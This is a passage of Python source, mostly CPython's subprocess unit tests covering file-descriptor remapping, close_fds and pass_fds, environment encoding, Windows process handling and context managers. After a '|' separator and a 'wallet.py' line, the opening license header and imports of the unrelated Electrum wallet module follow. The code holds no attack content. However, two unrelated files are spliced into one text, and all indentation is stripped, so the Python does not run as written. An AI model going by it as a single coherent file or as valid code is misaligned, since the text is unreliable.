os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
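# Illustrative sketch (not part of the test suite, names are invented): the
# hazard these tests exercise is that naively dup2()-ing fds onto 0, 1 and 2
# can clobber a source fd that is itself one of 0, 1 or 2 before it has been
# copied. One common way to avoid it is to dup() the sources out of the low
# range first, e.g.:
#
#   import os
#   mapping = {0: 2, 2: 0}                          # child fd <- parent fd
#   saved = {src: os.dup(src) for src in set(mapping.values())}
#   for dst, src in mapping.items():
#       os.dup2(saved[src], dst)                    # safe: sources were duped away
#   for fd in saved.values():
#       os.close(fd)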
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest process's maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, [], cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(mswindows, "Windows-specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises((FileNotFoundError, PermissionError)) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import re
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee, PrintError,
UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string,
TimeoutException, is_verbose)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
